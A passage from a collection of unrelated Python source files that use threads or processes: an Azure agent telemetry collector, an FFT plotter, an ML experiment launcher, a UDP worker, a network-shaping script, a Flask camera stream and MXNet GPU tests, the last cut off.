if not os.path.exists(event_dir_path):
return
log_err = True
# Delete any residue files in the events directory
for residue_file in os.listdir(event_dir_path):
try:
os.remove(os.path.join(event_dir_path, residue_file))
except Exception as error:
# Only log the first error once per handler per run to keep the logfile clean
if log_err:
logger.error("Failed to completely clear the {0} directory. Exception: {1}", event_dir_path,
ustr(error))
log_err = False
def _enqueue_events_and_get_count(self, handler_name, event_file_path, captured_events_count,
dropped_events_with_error_count):
event_file_time = datetime.datetime.fromtimestamp(os.path.getmtime(event_file_path))
# Read event file and decode it properly
with open(event_file_path, "rb") as event_file_descriptor:
event_data = event_file_descriptor.read().decode("utf-8")
# Parse the string and get the list of events
events = json.loads(event_data)
# We allow multiple events in a file but there can be an instance where the file only has a single
# JSON event and not a list. Handling that condition too
if not isinstance(events, list):
events = [events]
for event in events:
try:
self._send_telemetry_events_handler.enqueue_event(
self._parse_telemetry_event(handler_name, event, event_file_time)
)
captured_events_count += 1
except InvalidExtensionEventError as invalid_error:
# These are the errors thrown if there's an error parsing the event. We want to report these back to the
# extension publishers so that they are aware of the issues.
# The error messages are all static messages, we will use this to create a dict and emit an event at the
# end of each run to notify if there were any errors parsing events for the extension
dropped_events_with_error_count[ustr(invalid_error)] += 1
except ServiceStoppedError as stopped_error:
logger.error(
"Unable to enqueue events as service stopped: {0}. Stopping collecting extension events".format(
ustr(stopped_error)))
raise
except Exception as error:
logger.warn("Unable to parse and transmit event, error: {0}".format(error))
if captured_events_count >= self._MAX_NUMBER_OF_EVENTS_PER_EXTENSION_PER_PERIOD:
break
return captured_events_count
def _parse_telemetry_event(self, handler_name, extension_unparsed_event, event_file_time):
"""
Parse the Json event file and convert it to TelemetryEvent object with the required data.
:return: Complete TelemetryEvent with all required fields filled up properly. Raises if event breaches contract.
"""
extension_event = self._parse_event_and_ensure_it_is_valid(extension_unparsed_event)
# Create a telemetry event, add all common parameters to the event
# and then overwrite all the common params with extension events params if same
event = TelemetryEvent(TELEMETRY_LOG_EVENT_ID, TELEMETRY_LOG_PROVIDER_ID)
event.file_type = "json"
CollectTelemetryEventsHandler.add_common_params_to_telemetry_event(event, event_file_time)
replace_or_add_params = {
GuestAgentGenericLogsSchema.EventName: "{0}-{1}".format(handler_name, extension_event[
ExtensionEventSchema.Version.lower()]),
GuestAgentGenericLogsSchema.CapabilityUsed: extension_event[ExtensionEventSchema.EventLevel.lower()],
GuestAgentGenericLogsSchema.TaskName: extension_event[ExtensionEventSchema.TaskName.lower()],
GuestAgentGenericLogsSchema.Context1: extension_event[ExtensionEventSchema.Message.lower()],
GuestAgentGenericLogsSchema.Context2: extension_event[ExtensionEventSchema.Timestamp.lower()],
GuestAgentGenericLogsSchema.Context3: extension_event[ExtensionEventSchema.OperationId.lower()],
GuestAgentGenericLogsSchema.EventPid: extension_event[ExtensionEventSchema.EventPid.lower()],
GuestAgentGenericLogsSchema.EventTid: extension_event[ExtensionEventSchema.EventTid.lower()]
}
self._replace_or_add_param_in_event(event, replace_or_add_params)
return event
def _parse_event_and_ensure_it_is_valid(self, extension_event):
"""
Parse the Json event from file. Raise InvalidExtensionEventError if the event breaches pre-set contract.
:param extension_event: The json event from file
:return: Verified Json event that qualifies the contract.
"""
clean_string = lambda x: x.strip() if x is not None else x
event_size = 0
key_err_msg = "{0}: {1} not found"
# Convert the dict to all lower keys to avoid schema confusion.
# Only pick the params that we care about and skip the rest.
event = dict((k.lower(), clean_string(v)) for k, v in extension_event.items() if
k.lower() in self._EXTENSION_EVENT_REQUIRED_FIELDS)
# Trim message and only pick the first 3k chars
message_key = ExtensionEventSchema.Message.lower()
if message_key in event:
event[message_key] = event[message_key][:self._EXTENSION_EVENT_MAX_MSG_LEN]
else:
raise InvalidExtensionEventError(
key_err_msg.format(InvalidExtensionEventError.MissingKeyError, ExtensionEventSchema.Message))
if not event[message_key]:
raise InvalidExtensionEventError(
"{0}: {1} should not be empty".format(InvalidExtensionEventError.EmptyMessageError,
ExtensionEventSchema.Message))
for required_key in self._EXTENSION_EVENT_REQUIRED_FIELDS:
# If all required keys not in event then raise
if required_key not in event:
raise InvalidExtensionEventError(
key_err_msg.format(InvalidExtensionEventError.MissingKeyError, required_key))
# If the event_size > _EXTENSION_EVENT_MAX_SIZE=6k, then raise
if event_size > self._EXTENSION_EVENT_MAX_SIZE:
raise InvalidExtensionEventError(
"{0}: max event size allowed: {1}".format(InvalidExtensionEventError.OversizeEventError,
self._EXTENSION_EVENT_MAX_SIZE))
event_size += len(event[required_key])
return event
@staticmethod
def _replace_or_add_param_in_event(event, replace_or_add_params):
for param in event.parameters:
if param.name in replace_or_add_params:
param.value = replace_or_add_params.pop(param.name)
if not replace_or_add_params:
# All values replaced, return
return
# Add the remaining params to the event
for param_name in replace_or_add_params:
event.parameters.append(TelemetryEventParam(param_name, replace_or_add_params[param_name]))
class _CollectAndEnqueueEvents(PeriodicOperation):
"""
Periodic operation to collect telemetry events located in the events folder and enqueue them for the
SendTelemetryHandler thread.
"""
_EVENT_COLLECTION_PERIOD = datetime.timedelta(minutes=1)
def __init__(self, send_telemetry_events_handler):
super(_CollectAndEnqueueEvents, self).__init__(_CollectAndEnqueueEvents._EVENT_COLLECTION_PERIOD)
self._send_telemetry_events_handler = send_telemetry_events_handler
def _operation(self):
"""
Periodically send any events located in the events folder
"""
try:
if self._send_telemetry_events_handler.stopped():
logger.warn("{0} service is not running, skipping iteration.".format(
self._send_telemetry_events_handler.get_thread_name()))
return
self.process_events()
except Exception as error:
err_msg = "Failure in collecting telemetry events: {0}".format(ustr(error))
add_event(op=WALAEventOperation.UnhandledError, message=err_msg, is_success=False)
def process_events(self):
"""
Returns a list of events that need to be sent to the telemetry pipeline and deletes the corresponding files
from the events directory.
"""
event_directory_full_path = os.path.join(conf.get_lib_dir(), EVENTS_DIRECTORY)
event_files = os.listdir(event_directory_full_path)
debug_info = CollectOrReportEventDebugInfo(operation=CollectOrReportEventDebugInfo.OP_COLLECT)
for event_file in event_files:
try:
match = EVENT_FILE_REGEX.search(event_file)
if match is None:
continue
event_file_path = os.path.join(event_directory_full_path, event_file)
try:
logger.verbose("Processing event file: {0}", event_file_path)
with open(event_file_path, "rb") as event_fd:
event_data = event_fd.read().decode("utf-8")
event = parse_event(event_data)
# "legacy" events are events produced by previous versions of the agent (<= 2.2.46) and extensions;
# they do not include all the telemetry fields, so we add them here
is_legacy_event = match.group('agent_event') is None
if is_legacy_event:
# We'll use the file creation time for the event's timestamp
event_file_creation_time_epoch = os.path.getmtime(event_file_path)
event_file_creation_time = datetime.datetime.fromtimestamp(event_file_creation_time_epoch)
if event.is_extension_event():
_CollectAndEnqueueEvents._trim_legacy_extension_event_parameters(event)
CollectTelemetryEventsHandler.add_common_params_to_telemetry_event(event,
event_file_creation_time)
else:
_CollectAndEnqueueEvents._update_legacy_agent_event(event,
event_file_creation_time)
self._send_telemetry_events_handler.enqueue_event(event)
finally:
# Todo: We should delete files after ensuring that we sent the data to Wireserver successfully
# from our end rather than deleting first and sending later. This is to ensure the data reliability
# of the agent telemetry pipeline.
os.remove(event_file_path)
except ServiceStoppedError as stopped_error:
logger.error(
"Unable to enqueue events as service stopped: {0}, skipping events collection".format(
ustr(stopped_error)))
except UnicodeError as uni_err:
debug_info.update_unicode_error(uni_err)
except Exception as error:
debug_info.update_op_error(error)
debug_info.report_debug_info()
@staticmethod
def _update_legacy_agent_event(event, event_creation_time):
# Ensure that if an agent event is missing a field from the schema defined since 2.2.47, the missing fields
# will be appended, ensuring the event schema is complete before the event is reported.
new_event = TelemetryEvent()
new_event.parameters = []
CollectTelemetryEventsHandler.add_common_params_to_telemetry_event(new_event, event_creation_time)
event_params = dict([(param.name, param.value) for param in event.parameters])
new_event_params = dict([(param.name, param.value) for param in new_event.parameters])
missing_params = set(new_event_params.keys()).difference(set(event_params.keys()))
params_to_add = []
for param_name in missing_params:
params_to_add.append(TelemetryEventParam(param_name, new_event_params[param_name]))
event.parameters.extend(params_to_add)
@staticmethod
def _trim_legacy_extension_event_parameters(event):
"""
This method is called for extension events before they are sent out. Per the agreement with extension
publishers, the parameters that belong to extensions and will be reported intact are Name, Version, Operation,
OperationSuccess, Message, and Duration. Since there is nothing preventing extensions to instantiate other
fields (which belong to the agent), we call this method to ensure the rest of the parameters are trimmed since
they will be replaced with values coming from the agent.
:param event: Extension event to trim.
:return: Trimmed extension event; containing only extension-specific parameters.
"""
params_to_keep = dict().fromkeys([
GuestAgentExtensionEventsSchema.Name,
GuestAgentExtensionEventsSchema.Version,
GuestAgentExtensionEventsSchema.Operation,
GuestAgentExtensionEventsSchema.OperationSuccess,
GuestAgentExtensionEventsSchema.Message,
GuestAgentExtensionEventsSchema.Duration
])
trimmed_params = []
for param in event.parameters:
if param.name in params_to_keep:
trimmed_params.append(param)
event.parameters = trimmed_params
class CollectTelemetryEventsHandler(ThreadHandlerInterface):
"""
This Handler takes care of fetching the Extension Telemetry events from the {extension_events_dir} and sends it to
Kusto for advanced debuggability.
"""
_THREAD_NAME = "TelemetryEventsCollector"
def __init__(self, send_telemetry_events_handler):
self.should_run = True
self.thread = None
self._send_telemetry_events_handler = send_telemetry_events_handler
@staticmethod
def get_thread_name():
return CollectTelemetryEventsHandler._THREAD_NAME
def run(self):
logger.info("Start Extension Telemetry service.")
self.start()
def is_alive(self):
return self.thread is not None and self.thread.is_alive()
def start(self):
self.thread = threading.Thread(target=self.daemon)
self.thread.setDaemon(True)
self.thread.setName(CollectTelemetryEventsHandler.get_thread_name())
self.thread.start()
def stop(self):
"""
Stop server communication and join the thread to main thread.
"""
self.should_run = False
if self.is_alive():
self.thread.join()
def stopped(self):
return not self.should_run
def daemon(self):
periodic_operations = [
_CollectAndEnqueueEvents(self._send_telemetry_events_handler)
]
is_etp_enabled = get_supported_feature_by_name(SupportedFeatureNames.ExtensionTelemetryPipeline).is_supported
logger.info("Extension Telemetry pipeline enabled: {0}".format(is_etp_enabled))
if is_etp_enabled:
periodic_operations.append(_ProcessExtensionEvents(self._send_telemetry_events_handler))
logger.info("Successfully started the {0} thread".format(self.get_thread_name()))
while not self.stopped():
try:
for periodic_op in periodic_operations:
periodic_op.run()
except Exception as error:
logger.warn(
"An error occurred in the Telemetry Extension thread main loop; will skip the current iteration.\n{0}",
ustr(error))
finally:
PeriodicOperation.sleep_until_next_operation(periodic_operations)
@staticmethod
def add_common_params_to_telemetry_event(event, event_time):
reporter = get_event_logger()
reporter.add_common_event_parameters(event, event_time)
|
stdin-plot.py
|
#!/usr/bin/python3
import collections
import sys
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.animation as animation
from matplotlib import style
from matplotlib.lines import Line2D
from threading import Thread
style.use('dark_background')
#style.use('ggplot')
figure = plt.figure()
timedomain = figure.add_subplot(2,1,1)
spectrum = figure.add_subplot(2,1,2)
tdline = Line2D([], [], color='red', linewidth=2)
fdline = Line2D([], [], color='red', linewidth=2)
timedomain.add_line(tdline);
spectrum.add_line(fdline);
timedomain.set_xlim(1, 2200)
timedomain.set_ylim(-100, 100)
spectrum.set_xlim(1, 1100)
spectrum.set_ylim(-70, 0)
# Use a Deque with limited size as a FIFO. This implementation drops old data
# on overflow. Exactly what we need.
fifo = collections.deque(maxlen = 10)
def readData():
while True:
tmp = sys.stdin.readline().strip().split(" ")
data = np.array(tmp, dtype=np.double)
#print("DataSize:", len(data))
fifo.append(data)
def init():
return fdline,tdline
def update(frame):
if len(frame) == 0:
#print("Nop")
return tdline,fdline
frame = frame - np.mean(frame)
n = len(frame)
if n != 2200:
print("python: ", n)
xs = list(range(1, n + 1))
windowed = np.hanning(n) * frame
fd = np.multiply(20, np.log10(np.abs(np.fft.fft(windowed)))) - 100
n = int(len(fd) / 2)
fd = fd[0:n]
fs = list(range(1, n + 1))
tdline.set_data(xs, frame)
fdline.set_data(fs, fd)
return tdline,fdline
def fetch():
while True:
if len(fifo) == 0:
yield []
else:
yield fifo.popleft()
reader = Thread(target = readData)
reader.start()
ani = animation.FuncAnimation(fig = figure,
func = update,
frames = fetch,
interval = 80,
repeat = False,
blit = True)
plt.show()
|
fit.py
|
import sys
import os
from musket_core.project_paths import *
print(("Adding " + os.path.dirname(sys.path[0]).replace('\\', '/')).encode('ascii', 'replace'))
#sys.path.append(os.path.dirname(sys.path[0]))
sys.path[0] = os.path.dirname(sys.path[0])
print("sys.path:")
print(str(sys.path).replace('\\', '/').encode('ascii', 'replace'))
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = "0" #,1,2"
import argparse
from musket_core.projects import Workspace
from musket_core import caches, deps_download, fit_callbacks
from musket_core.tools import Launch,ProgressMonitor
import tensorflow as tf
from multiprocessing import Process
try:
#do not remove
import torch
except:
pass
def main():
parser = argparse.ArgumentParser(description='Analize experiment metrics.')
parser.add_argument('--project', type=str, required=True,
help='folder to search for experiments')
parser.add_argument('--name', type=str, default="",
help='name of the experiment')
parser.add_argument('--num_gpus', type=int, default=1,
help='number of gpus')
parser.add_argument('--gpus_per_net', type=int, default=1,
help='number of gpus')
parser.add_argument('--num_workers', type=int, default=1,
help='number of workers')
parser.add_argument('--allow_resume', type=bool, default=False,
help='allow resuming of experiments')
parser.add_argument('--force_recalc', type=bool, default=False,
help='force rebuild reports and predictions')
parser.add_argument('--launch_tasks', type=bool, default=False,
help='launch associated tasks')
parser.add_argument('--only_report', type=bool, default=False,
help='only generate reports')
parser.add_argument('--cache', type=str, default="",
help='cache directory')
parser.add_argument('--folds', type=str, default=None,
help='folds to execute')
parser.add_argument('--time', type=int, default=-1,
help='time to work')
parser.add_argument('--one_process', type=bool, default=False,
help='Start all experiments in one process. Good to use for several small experiments')
parser.add_argument('-d','--download_deps', action='store_true',
help='download dependencies (e.g. dataset) prior to fitting')
if not "--project" in sys.argv:
proj_path = project_path()
print("No --project parameter specified, will use following folder as project: {}".format(proj_path.replace('\\', '/')).encode('ascii', 'replace'))
sys.argv.append("--project")
sys.argv.append(proj_path)
args = parser.parse_args()
if len(args.cache)>0:
caches.CACHE_DIR = args.cache
workspace=Workspace()
project=workspace.project(args.project)
experiments=project.experiments()
if len(args.name)>0:
mmm=args.name.split(",")
res=[]
for x in experiments:
if x.name() in mmm:
res.append(x)
experiments = sorted(res, key = lambda x: mmm.index(x.name()))
else:
experiments=[x for x in experiments if not x.isCompleted()]
if tf.test.gpu_device_name():
print('Default GPU Device: {}'.format(tf.test.gpu_device_name()))
else:
print("Please install GPU version of TF")
folds = args.folds
if folds:
folds = [int(item) for item in folds.split(',')]
if args.download_deps:
deps_download.main(sys.argv)
if len(experiments) == 0:
print("No experiments or all experiments already finished, nothing to launch")
elif args.one_process or len(experiments) == 1:
perform_experiments(workspace, args.gpus_per_net,args.num_gpus,args.num_workers,[x.path for x in experiments],args.allow_resume,args.only_report,args.launch_tasks, folds, args.time)
print("===== All experiments finished =====")
else:
for x in experiments:
p = Process(target=perform_experiments, args=(workspace,args.gpus_per_net,args.num_gpus,args.num_workers,[x.path],args.allow_resume,args.only_report,args.launch_tasks, folds, args.time))
p.start()
p.join()
print("===== All experiments finished =====")
callbacks = fit_callbacks.get_after_fit_callbacks()
if (len(callbacks) > 0):
print("Running {} after-fit callbacks".format(len(callbacks)))
for func in callbacks:
print("Callback {}".format(func.__name__))
func()
exit(0)
pass
def perform_experiments(workspace, gpus_per_net,num_gpus,num_workers, experiment_paths,allow_resume,only_report,launch_tasks, folds, time):
l=Launch(gpus_per_net,num_gpus,num_workers,experiment_paths,allow_resume,only_report,launch_tasks, folds, time)
l.perform(workspace,ProgressMonitor())
if __name__ == '__main__':
main()
|
worker.py
|
# -*- coding: utf-8 -*-
import json
import threading
import time
import logging
import socket
import random
from register import register
from logger import logger
def get_config(filename='config.json'):
try:
with open(filename) as f:
return json.load(f)
except IOError as err:
logger.error('IOError: %s', err)
except ValueError as err:
logger.error('ValueError: %s', err)
def start_register_thread(config, port_task_worker):
register_config = config['register']
host, port = register_config['host'], register_config['port']
worker_id = config['id']
time_to_live = register_config.get('time_to_live', 60)
thread_register = threading.Thread(
target=register, args=(host, port, worker_id, port_task_worker, time_to_live))
thread_register.daemon = True
thread_register.start()
def main():
logging.basicConfig(level=logging.DEBUG)
config = get_config()
if not config or 'worker' not in config:
logger.error('Config file is failed')
return
logger.debug('config: %s', config)
# Здесь открываем случайный udp порт для получения задач от диспетчера
# номер порта потом сообщим диспетчеру
# Тут кстати я забыл про условие, что порт задаётся в конфиге
# но будем считать это фичёй: для запуска нескольких воркеров нам не придётся править конфиг :)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('0.0.0.0', 0))
port_task_worker = sock.getsockname()[1]
logger.info('port for recv task: %s', port_task_worker)
# Регистрация воркера происходит в отдельном треде
start_register_thread(config['worker'], port_task_worker)
calculation_time = config['worker'].get('calculation_time', (2, 10))
probability_of_failure = config['worker'].get('probability_of_failure', 0.1)
time_of_failure = config['worker'].get('time_of_failure', 15)
# Основной цикл обработки задач
i = 0
while True:
task, dispatcher = sock.recvfrom(1024)
logger.info('recv task "%s" from %s', task, dispatcher)
time.sleep(random.randint(*calculation_time))
result = 'task %s (%s) done' % (i, task)
sock.sendto(result, dispatcher)
logger.info('send result task %s (%s)', i, task)
if random.random() <= probability_of_failure:
logger.error('broken worker (%s second)', time_of_failure)
time.sleep(time_of_failure)
i += 1
if __name__ == "__main__":
main()
|
dynamic_tc.py
|
"""
這裡程式可以動態改變鏈路網路狀態目的是更靈活的模擬改變網路
delay-distro=jitter
https://github.com/Lu-Yi-Hsun/tcconfig#set-traffic-control-tcset-command
sudo tcset s2-eth1 --delay 30ms --rate 10Kbps --loss 50.1% --delay-distro 10ms --overwrite
"""
import zmq
from multiprocessing import Process
import os
import time
import random
def tc(interface="s1-eth1",delay=1,bw=1,loss=0.2,jitter=2):
command="sudo tcset %s --delay %dms --rate %dKbps --loss %f%% --delay-distro %dms --overwrite"%(interface,delay,bw,loss,jitter)
print(command)
print(os.system(command))
def entry(interface_list):
while True:
for i in interface_list:
print(i)
jobs = []
interface=i
delay=random.randint(1, 1000)
bw=1000000
loss=random.randint(0, 100)/100
jitter=random.randint(1, 100)
p1 = Process(target=tc,args=(interface,delay,bw,loss,jitter,))
jobs.append(p1)
p1.start()
for j in jobs:
j.join()
time.sleep(10)
|
streamingService.py
|
import cv2
from CameraLib import baseCamera, faceTracking
from IotLib.log import Log
from IotLib.iotNode import IotNode
from IotLib.pyUtils import startThread
def startVideoStream(camera, config, debug=False):
""" start video stream """
port = config.getOrAddInt('video.httpVideoPort', 8000)
streamer = VideoStream('video', parent=None, camera=camera, config=config, debug=debug)
streamer.startUp()
streamer.runVideoStreaming(port)
def startVideoStreamAsync(camera, config, debug=False):
""" start video stream in a separate thread """
port = config.getOrAddInt('video.httpVideoPort', 8000)
streamer = VideoStream('video', parent=None, camera=camera, config=config, debug=debug)
streamer.startUp()
videoThread=startThread('VideoStream', target=streamer.runVideoStreaming, front=True, args=(port,))
class VideoStream(IotNode):
""" video streaming with optional face tracking """
def __init__(self, name, parent, camera, config, debug=False):
""" construct a PiCamera """
super(VideoStream, self).__init__(name, parent)
self.camera = camera
self.config = config
self.debug = debug
def startUp(self):
""" override to start the components """
width, height = self.camera.resolution()
# update index.html with proper width and height
try:
indexHtmlFile = self.config.getOrAdd('video.indexHtml', '/home/pi/src/VideoLib/templates/index.html')
with open(indexHtmlFile, "w", encoding="utf-8") as f:
url = "{{ url_for('video_feed') }}"
html='<html> <head> <title>Video Streaming</title> </head> <body> <img src="%s" width="%i" height="%i"> </body></html>' %(url, width, height)
f.writelines('%s\n' %(html))
except:
pass
self.faceTracker = None
enableFaceTracking = self.config.getOrAddBool('video.enableFaceTracking', 'true')
if enableFaceTracking:
filePath = self.config.getOrAdd('video.classifier', '/home/pi/src/data/haarcascade_frontalface_alt.xml')
self.classifier = cv2.CascadeClassifier(filePath)
#self.classifier = cv2.CascadeClassifier('/home/pi/adeept_picar-b/server/data/haarcascade_frontalface_alt.xml')
self.faceTracker = faceTracking.FaceTracker(self.classifier, debug=self.debug)
Log.info('Streaming camera (%i x %i) with classifier: %s' %(width, height, filePath))
else:
self.faceTracker = None
Log.info('Streaming camera (%i x %i)' %(width, height))
def runVideoStreaming(self, port):
""" run video streaming (flask app) as a web. Should be called from a dedicated thread. """
Log.info('starting httpVideoStreaming on port %d' %port)
runVideoStreaming(port, self.camera, tracker=self.faceTracker, debug=self.debug, threaded=True)
from flask import Flask, render_template, Response
_app = Flask(__name__)
# the camera object (derived from BaseCamera) for video capture
_streamingCamera = None
# face tracking object (FaceTracker)
_faceTracker = None
def runVideoStreaming(port, camera, classifier=None, tracker=None, debug=False, threaded=True):
""" run video streaming (flask app) as a web. calling parameters:
port: the port number for the http web
camera: a camera instance that is derived from baseCamera.BaseCamera
classifier: face tracking with FaceTracker using the specified classifier
tracker: face tracking object (FaceTracker or instance of derived class)
debug: whether to run the flask app under debug
threaded: whether to run flask app threaded
"""
global _streamingCamera, _faceTracker
_streamingCamera = camera
if tracker != None:
_faceTracker = tracker
elif classifier != None:
_faceTracker = FaceTracker(classifier, debug=debug)
_app.run(host='0.0.0.0', port=port, debug=debug, threaded=threaded, use_reloader=False)
@_app.route('/')
def index():
"""Video streaming home page."""
return render_template('index.html')
def gen(camera):
"""Video streaming generator function."""
while True:
tracking = _faceTracker != None # and opencv_mode != 0
img = camera.get_frame(tracking)
# encode as a jpeg image and return it
frame = cv2.imencode('.jpg', img)[1].tobytes()
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n')
@_app.route('/video_feed')
def video_feed():
""" Video streaming route. """
_streamingCamera.start(_faceTracker)
return Response(gen(_streamingCamera), mimetype='multipart/x-mixed-replace; boundary=frame')
|
simple_print_worker.py
|
#!/usr/bin/env python
# encoding: utf-8
from __future__ import print_function
import multiprocessing
def worker(num):
"""The `num` passed should be pickle-lable"""
print("hello there", num)
return
if __name__ == "__main__":
jobs = []
for i in range(5):
p = multiprocessing.Process(target=worker, args=(i,))
jobs.append(p)
p.start()
|
test_operator_gpu.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import sys
import os
import time
import multiprocessing as mp
import unittest
import mxnet as mx
import numpy as np
import unittest
from nose.tools import assert_raises
from mxnet.test_utils import check_consistency, set_default_context, assert_almost_equal
from mxnet.base import MXNetError
from mxnet import autograd
from numpy.testing import assert_allclose
curr_path = os.path.dirname(os.path.abspath(os.path.expanduser(__file__)))
sys.path.insert(0, os.path.join(curr_path, '../unittest'))
from common import setup_module, with_seed, teardown, assert_raises_cudnn_disabled
from test_operator import *
from test_optimizer import *
from test_random import *
from test_gluon import *
from test_loss import *
from test_exc_handling import *
#from test_rnn import *
from test_gluon_rnn import *
from test_sparse_ndarray import *
from test_sparse_operator import *
from test_ndarray import *
set_default_context(mx.gpu(0))
del test_support_vector_machine_l1_svm # noqa
del test_support_vector_machine_l2_svm # noqa
def check_countsketch(in_dim,out_dim,n):
data = mx.sym.Variable("data")
h = mx.sym.Variable("h")
s = mx.sym.Variable("s")
sym = mx.sym.contrib.count_sketch(data=data, h=h, s=s, name='countsketch',out_dim = out_dim)
shape = [(n,in_dim), (1,in_dim),(1,in_dim)] #shape of input x, hash h and hash s
arr = [mx.nd.empty(shape[i]) for i in range(3)]
arr_grad = [mx.nd.empty(shape[i]) for i in range(3)]
x = np.random.uniform(-10, 10, shape[0])
arr[0][:] = x #input x
h = np.random.randint(0, out_dim, shape[1])
arr[1][:] = h #hash h
s = np.random.randint(0, 2, shape[2])*2-np.ones(shape[2])
arr[2][:] = s #hash s
locations = {"data": x, "h": h, "s": s}
a = np.zeros((n,out_dim))
temp = np.multiply(x, s)
for num_sample in np.arange(0,n):
for idx in np.arange(0,in_dim):
a[num_sample][h[0][idx]] += temp[num_sample][idx]
check_symbolic_forward(sym, locations, [a], rtol=1e-3, atol=1e-5, ctx=mx.gpu(0))
out_grad = mx.nd.empty((n,out_dim))
out_grad[:] = np.random.normal(-3, 3, (n,out_dim))
a = np.zeros((n,in_dim))
for j in np.arange(0,n):
for i in np.arange(0,in_dim):
a[j,i] = out_grad.asnumpy()[j, h[0,i]] * s[0,i]
check_symbolic_backward(sym, locations, [out_grad], [a], rtol=1e-3, atol=1e-5, ctx=mx.gpu(0))
@with_seed()
def test_countsketch():
minindim = 40
maxindim = 100
minoutdim = 5
maxoutdim = 30
maxn = 200
in_dim = np.random.randint(minindim, maxindim)
out_dim = np.random.randint(minoutdim, maxoutdim)
n = np.random.randint(1, maxn)
check_countsketch(in_dim, out_dim, n)
def check_ifft(shape):
shape_old = shape
if len(shape) == 2:
if shape[1]%2 != 0:
lst = list(shape)
lst[1] = lst[1]*2
shape = tuple(lst)
shape_old = shape
shape = (shape[0],shape[1]*2)
if len(shape) == 4:
if shape[3]%2 != 0:
lst = list(shape)
lst[3] = lst[3]*2
shape = tuple(lst)
shape_old = shape
shape = (shape[0],shape[1],shape[2],shape[3]*2)
sym = mx.sym.contrib.ifft(name='ifft', compute_size = 128)
init = [np.random.normal(size=shape, scale=1.0)]
arr_grad = [mx.nd.empty(shape)]
ctx_list = [{'ctx': mx.gpu(0),'ifft_data': shape, 'type_dict': {'ifft_data': np.float32}}]
exe_list = [sym.simple_bind(args_grad=arr_grad,**ctx) for ctx in ctx_list]
for exe in exe_list:
for arr, iarr in zip(exe.arg_arrays, init):
arr[:] = iarr.astype(arr.dtype)
# forward
for exe in exe_list:
exe.forward(is_train= True)
out1 = [exe.outputs[0].asnumpy() for exe in exe_list]
if len(shape) == 2:
init_complex = np.zeros(shape_old,dtype = np.complex64)
for i in range(0,shape_old[1]):
init_complex.real[:,i] = init[0][:,2*i]
init_complex.imag[:,i] = init[0][:,2*i+1]
a = np.fft.ifft(init_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, out1[0]/shape_old[1],rtol=1e-3, atol=1e-12)
if len(shape) == 4:
init_complex = np.zeros(shape_old,dtype = np.complex64)
for i in range(0,shape_old[3]):
init_complex.real[:,:,:,i] = init[0][:,:,:,2*i]
init_complex.imag[:,:,:,i] = init[0][:,:,:,2*i+1]
a = np.fft.ifft(init_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, out1[0]/shape_old[3],rtol=1e-3, atol=1e-12)
# backward
if len(shape) == 2:
out_grad = mx.nd.empty(shape_old)
out_grad[:] = np.random.normal(-3, 3, shape_old)
for exe in exe_list:
exe.backward([out_grad])
temp = exe.grad_arrays[0].asnumpy()
temp = np.zeros(shape_old)
for i in range(shape_old[1]):
temp[:,i] = exe.grad_arrays[0].asnumpy()[:,2*i]
a = np.fft.fft(out_grad.asnumpy(), n=None, axis=-1, norm=None)
assert_almost_equal(a.real, temp, rtol=1e-3, atol=1e-12)
if len(shape) == 4:
out_grad = mx.nd.empty(shape_old)
out_grad[:] = np.random.normal(-3, 3, shape_old)
for exe in exe_list:
exe.backward([out_grad])
temp = exe.grad_arrays[0].asnumpy()
temp = np.zeros(shape_old)
for i in range(shape_old[3]):
temp[:,:,:,i] = exe.grad_arrays[0].asnumpy()[:,:,:,2*i]
a = np.fft.fft(out_grad.asnumpy(), n=None, axis=-1, norm=None)
assert_almost_equal(a.real, temp, rtol=1e-3, atol=1e-12)
@with_seed(0)
def test_ifft():
nrepeat = 2
maxdim = 10
for repeat in range(nrepeat):
for order in [2,4]:
shape = tuple(np.random.randint(1, maxdim, size=order))
check_ifft(shape)
def check_fft(shape):
sym = mx.sym.contrib.fft(name='fft', compute_size = 128)
if len(shape) == 2:
if shape[1]%2 != 0:
lst = list(shape)
lst[1] = lst[1]*2
shape = tuple(lst)
shape_old = shape
if len(shape) == 4:
if shape[3]%2 != 0:
lst = list(shape)
lst[3] = lst[3]*2
shape = tuple(lst)
shape_old = shape
init = [np.random.normal(size=shape, scale=1.0)]
arr_grad = [mx.nd.empty(shape)]
ctx_list = [{'ctx': mx.gpu(0),'fft_data': shape, 'type_dict': {'fft_data': np.float32}}]
exe_list = [sym.simple_bind(args_grad=arr_grad,**ctx) for ctx in ctx_list]
for exe in exe_list:
for arr, iarr in zip(exe.arg_arrays, init):
arr[:] = iarr.astype(arr.dtype)
#forward
for exe in exe_list:
exe.forward(is_train=True)
out1 = [exe.outputs[0].asnumpy() for exe in exe_list]
out = np.fft.fft(init, n=None, axis=-1, norm=None)
if len(shape) == 2:
out = np.reshape(out,(out.shape[1],out.shape[2]))
out2 = np.append(out.real, out.imag, axis = 1)
a = np.zeros(out1[0].shape)
p = 0
for i in range(out2.shape[1]//2):
a[:,p] = out2[:,i]
a[:,p+1] = out2[:,i+out2.shape[1]//2]
p = p+2
if len(shape) == 4:
out = np.reshape(out,(out.shape[1],out.shape[2],out.shape[3],out.shape[4]))
out2 = np.append(out.real, out.imag, axis = 1)
a = np.zeros(out1[0].shape)
for i in range(out1[0].shape[0]):
for j in range(out1[0].shape[1]):
p = 0
for k in range(out2.shape[3]):
a[i,j,:,p] = out2[i,j,:,k]
a[i,j,:,p+1] = out2[i,j+out1[0].shape[1],:,k]
p = p+2
assert_almost_equal(a, out1[0],rtol=1e-3, atol=1e-6)
# backward
if len(shape) == 2:
out_grad = mx.nd.empty((shape[0],2*shape[1]))
